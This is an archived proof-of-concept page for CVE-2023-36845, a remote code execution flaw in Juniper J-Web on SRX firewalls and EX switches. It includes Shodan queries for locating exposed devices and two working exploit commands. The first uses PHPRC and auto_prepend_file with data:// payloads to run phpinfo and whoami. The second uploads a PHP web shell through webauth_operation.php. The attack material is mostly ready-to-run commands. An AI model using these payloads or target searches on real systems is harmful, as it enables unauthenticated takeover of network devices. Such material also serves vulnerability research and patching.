Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2023-36845 PoC — Junos OS: EX and SRX Series: A PHP vulnerability in J-Web allows an unauthenticated to control an important environment

Source
https://github.com/kljunowsky/CVE-2023-36845
Associated Vulnerability
Title:Junos OS: EX and SRX Series: A PHP vulnerability in J-Web allows an unauthenticated to control an important environment variable (CVE-2023-36845)
Description:A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series and SRX Series allows an unauthenticated, network-based attacker to remotely execute code. Using a crafted request which sets the variable PHPRC an attacker is able to modify the PHP execution environment allowing the injection und execution of code. This issue affects Juniper Networks Junos OS on EX Series and SRX Series: * All versions prior to 20.4R3-S9; * 21.1 versions 21.1R1 and later; * 21.2 versions prior to 21.2R3-S7; * 21.3 versions prior to 21.3R3-S5; * 21.4 versions prior to 21.4R3-S5; * 22.1 versions prior to 22.1R3-S4; * 22.2 versions prior to 22.2R3-S2; * 22.3 versions prior to 22.3R2-S2, 22.3R3-S1; * 22.4 versions prior to 22.4R2-S1, 22.4R3; * 23.2 versions prior to 23.2R1-S1, 23.2R2.
Description
Juniper Firewalls CVE-2023-36845 - RCE
Readme
<h1 align=center>CVE-2023-36845</h1>
<p align="center">
    <img width=60% height=60% src="https://github.com/kljunowsky/CVE-2023-36845/assets/104329412/d8f4be14-148b-44ff-a294-25662f6007a6">
</p>



## Description

CVE-2023-36845 represents a notable PHP environment variable manipulation vulnerability that impacts Juniper SRX firewalls and EX switches. While Juniper has categorized this vulnerability as being of medium severity, in this article, we will elucidate how this singular vulnerability can be leveraged for remote, unauthenticated code execution.

## Search - Shodan
```
title:"Juniper Web Device Manager"
```
<img width="1840" alt="image" src="https://github.com/kljunowsky/CVE-2023-36845/assets/104329412/5b4224e1-7e5b-45fe-b2ee-0b1658c20b0d">

```
title:"Juniper" http.favicon.hash:2141724739
```

<img width="1840" alt="image" src="https://github.com/kljunowsky/CVE-2023-36845/assets/104329412/84aca479-7b9e-4a4d-84f0-8e678c367548">

## Usage 🛠
Detection
```
python3 CVE-2023-36845.py -f targets.txt -o output.txt
```

## RCE 🧨
### Option 1 
Utilizing any protocol wrapper in conjunction with `auto_prepend_file` is feasible. The most suitable choice for this operation is the `data://` protocol, which allows inline provision of the "secondary file". Here's a sophisticated representation of this exploit, executing the embedded `<? phpinfo(); ?>` within the `data://` scheme:

```
curl "http://target.tld/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD8KICAgcGhwaW5mbygpOwo/Pg=="'
```
Execute `whoami` command

`<?php shell_exec('whoami'); ?>`
```
curl "http://target.tld/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD9waHAgc2hlbGxfZXhlYygnd2hvYW1pJyk7ID8+Cg=="'
```

### Option 2
Upload a file

`<?php if(isset($_REQUEST[cmd])){ echo "<pre>"; $cmd = ($_REQUEST[cmd]); system($cmd); echo "</pre>"; die; }?>`

```
$ curl http://target.tld/webauth_operation.php -d 'rs=do_upload&rsargs[]=[{"fileName": "shell.php", "fileData": ",PD9waHAgaWYoaXNzZXQoJF9SRVFVRVNUW2NtZF0pKXsgZWNobyAiPHByZT4iOyAkY21kID0gKCRfUkVRVUVTVFtjbWRdKTsgc3lzdGVtKCRjbWQpOyBlY2hvICI8L3ByZT4iOyBkaWU7IH0/Pgo=
", "csize": 110}]'
```

## Parameters 🧰 

Parameter | Description | Type
------------ | ------------- | -------------
--file / -f | Input targets file | File
-o | Output file | File

## Contact Me 📇

[LinkedIn - Milan Jovic](https://www.linkedin.com/in/milan-jovic-sec/)
File Snapshot

 [4.0K]  /data/pocs/fb6d5c1b4cb7cd6a43a2e9b512aefb1c6753b881
├── [1.4K]  CVE-2023-36845.py
├── [1.0K]  LICENSE
└── [2.4K]  README.md

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →